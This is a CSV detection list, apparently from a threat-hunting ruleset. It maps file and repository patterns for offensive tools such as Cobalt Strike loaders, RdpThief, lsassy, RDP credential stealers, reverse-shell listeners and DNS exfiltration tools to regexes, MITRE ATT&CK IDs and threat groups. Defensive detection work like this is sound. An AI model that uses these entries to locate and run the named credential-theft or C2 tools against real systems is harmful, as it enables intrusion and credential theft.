"*/raw/kali/main/*",".{0,1000}\/raw\/kali\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10182"
"*/raw/kali/master/*",".{0,1000}\/raw\/kali\/master\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10183"
"*/raw/main/gsocket/*",".{0,1000}\/raw\/main\/gsocket\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10184"
"*/raw/master/Release/Happy.exe*",".{0,1000}\/raw\/master\/Release\/Happy\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","10186"
"*/raw/master/Release/Happy_x64.exe*",".{0,1000}\/raw\/master\/Release\/Happy_x64\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","10187"
"*/raw_shellcode_size.txt*",".{0,1000}\/raw_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","10189"
"*/rawrpc.py*",".{0,1000}\/rawrpc\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10190"
"*/rawrpc_embedded.py*",".{0,1000}\/rawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10191"
"*/RAZAR ASRAT.exe*",".{0,1000}\/RAZAR\sASRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10192"
"*/Razar SRAT.exe*",".{0,1000}\/Razar\sSRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10193"
"*/rbcd.py*",".{0,1000}\/rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10194"
"*/RC4BinaryEncryption.cs*",".{0,1000}\/RC4BinaryEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","10195"
"*/RC4Payload32.txt*",".{0,1000}\/RC4Payload32\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","10196"
"*/rcat-v*-win-x86_64.exe*",".{0,1000}\/rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","10197"
"*/RCStep/CSSG/*",".{0,1000}\/RCStep\/CSSG\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","10204"
"*/rdcman.py*",".{0,1000}\/rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10205"
"*/rdcmanfox.dll*",".{0,1000}\/rdcmanfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","10206"
"*/RDE1.git*",".{0,1000}\/RDE1\.git.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","10207"
"*/rdll_template*",".{0,1000}\/rdll_template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10208"
"*/RDP Recognizer.exe*",".{0,1000}\/RDP\sRecognizer\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","10209"
"*/rdp.py*",".{0,1000}\/rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10210"
"*/rdp_brute.git*",".{0,1000}\/rdp_brute\.git.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","10211"
"*/rdp_check.py*",".{0,1000}\/rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10212"
"*/RDPassSpray.git*",".{0,1000}\/RDPassSpray\.git.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","10213"
"*/RDPCredentialStealer.git*",".{0,1000}\/RDPCredentialStealer\.git.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10214"
"*/RDPCredentialStealer/releases/download/*",".{0,1000}\/RDPCredentialStealer\/releases\/download\/.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10215"
"*/RDPCredentialStealer/tarball/latest*",".{0,1000}\/RDPCredentialStealer\/tarball\/latest.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10216"
"*/rdp-enum-encryption.nse*",".{0,1000}\/rdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10217"
"*/RDPHook.dll*",".{0,1000}\/RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","10218"
"*/RDPKeylog.exe*",".{0,1000}\/RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","10219"
"*/RDPMITM.py*",".{0,1000}\/RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10220"
"*/rdp-ntlm-info.nse*",".{0,1000}\/rdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10221"
"*/rdp-sniffer.cap*",".{0,1000}\/rdp\-sniffer\.cap.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10226"
"*/RdpStrike.git*",".{0,1000}\/RdpStrike\.git.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","10227"
"*/RdpThief*",".{0,1000}RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","10228"
"*/RdpThief.cna*",".{0,1000}\/RdpThief\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10229"
"*/RdpThief.dll*",".{0,1000}\/RdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","10230"
"*/RdpThief.git*",".{0,1000}\/RdpThief\.git.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","10231"
"*/RdpThief_x64.tmp*",".{0,1000}\/RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10232"
"*/rdpv.exe*",".{0,1000}\/rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","10233"
"*/rdp-vuln-ms12-020.nse*",".{0,1000}\/rdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10234"
"*/readfile_bof.*",".{0,1000}\/readfile_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","10240"
"*/Readfile_BoF/*",".{0,1000}\/Readfile_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 